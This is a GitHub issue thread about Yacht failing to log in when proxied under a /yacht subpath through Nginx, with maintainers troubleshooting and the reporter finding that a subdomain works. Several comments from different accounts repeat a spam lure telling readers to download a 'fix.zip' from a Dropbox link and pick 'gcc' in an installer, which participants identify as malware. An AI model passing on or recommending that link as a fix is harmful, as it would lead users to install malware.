### ISSUE TITLE
[Bug Report] "Not Found: undefined" when trying to log in

### ISSUE THREAD

**Issue by Betonhaus** [SelfhostedPro/Yacht#711]
**Describe the bug**
When attempting to log in to the page, a red error message labelled "Not Found: undefined" pops up and login fails

**To Reproduce**
go to the page when it's proxied to /yacht on the server

**Expected behavior**
login completes and application is useable

**Screenshots**

**Desktop (please complete the following information):**
 - OS: Linux Mint
 - Browser Edge
 - Yacht Version  v0.0.7-alpha-2023-01-12--05

**Additional context**
reversed proxied through Nginx Proxy Manger, with the following custom code:
```
location /yacht/ {
    proxy_pass http://yacht:8000/;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "Upgrade";
}
```

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Betonhaus** [comment]
i see github has a malware problem now

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Betonhaus** [comment]
maybe I should be trying Rancher, this project having such a bad spammer problem is alarming

**Comment by wickedyoda** [comment]
> maybe I should be trying Rancher, this project having such a bad spammer problem is alarming

Try reporting the post, I already remove dthe links.

**Comment by Betonhaus** [comment]
> > maybe I should be trying Rancher, this project having such a bad spammer problem is alarming
> 
> Try reporting the post, I already remove dthe links.

I could only report two before I was blocked from reporting more

**Comment by SelfhostedPro** [comment]
> maybe I should be trying Rancher, this project having such a bad spammer problem is alarming

You could definitely try rancher if that’s what you’d prefer. They have different target audiences though.

**Comment by Betonhaus** [comment]
> > maybe I should be trying Rancher, this project having such a bad spammer problem is alarming
> 
> You could definitely try rancher if that’s what you’d prefer. They have different target audiences though.

I was mostly alarmed by the spam. I was trying to check out RTancher but it does seem to be different then what I need. Yacht works perfectly, I just wish i could put it behind a proxy with a different base url

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by SelfhostedPro** [comment]
You should be able to. It’s just a matter of setting up the proxy correctly. Can you check to see what url network requests in your browser go to when you click login (should be to /yacht/api/ with the config you’re using.

**Comment by wickedyoda** [comment]
> > > maybe I should be trying Rancher, this project having such a bad spammer problem is alarming
> > 
> > 
> > You could definitely try rancher if that’s what you’d prefer. They have different target audiences though.
> 
> I was mostly alarmed by the spam. I was trying to check out RTancher but it does seem to be different then what I need. Yacht works perfectly, I just wish i could put it behind a proxy with a different base url

Ill follow up tomorrow, I run mine on an AWS system thats ubuntu with docker, then only thing I have exposed in the nginx container 80 and 443. But I access my yacht container by a https://subdomain.domain.url by pointing it internally to the internal IP of the AWS system and port of yacht.  I can link the container for nginx and my settings tomorrow. But I dont change the api settings in the config, i leave them as they are.

**Comment by wickedyoda** [comment]
> > > maybe I should be trying Rancher, this project having such a bad spammer problem is alarming
> > 
> > 
> > You could definitely try rancher if that’s what you’d prefer. They have different target audiences though.
> 
> I was mostly alarmed by the spam. I was trying to check out RTancher but it does seem to be different then what I need. Yacht works perfectly, I just wish i could put it behind a proxy with a different base url

I normally watch github pretty close and get messages about most of the stuff posted through discord webhooks, but I hadnt seen those messages and they are rare. I have seen them spam other repos before but this is the first time for ours.

**Comment by Betonhaus** [comment]
to be honest it was the first time I had seen them and I didn't understand why they were on this specific repo. I was trying to think why they would be on this particular one and I guess I made false assumptions.

it looks like yacht works fine when you proxy it to a normal subdomain (like yacht.mysite.com instead of mysite.com/yacht) which I suppose is the accepted practice, so there is really nothing buggy on yacht aside from not being intended for a rare and improper use case

**Comment by wickedyoda** [comment]
We have a discord if you would like to join and speak directly, https://discord.gg/JfsebxqKDW
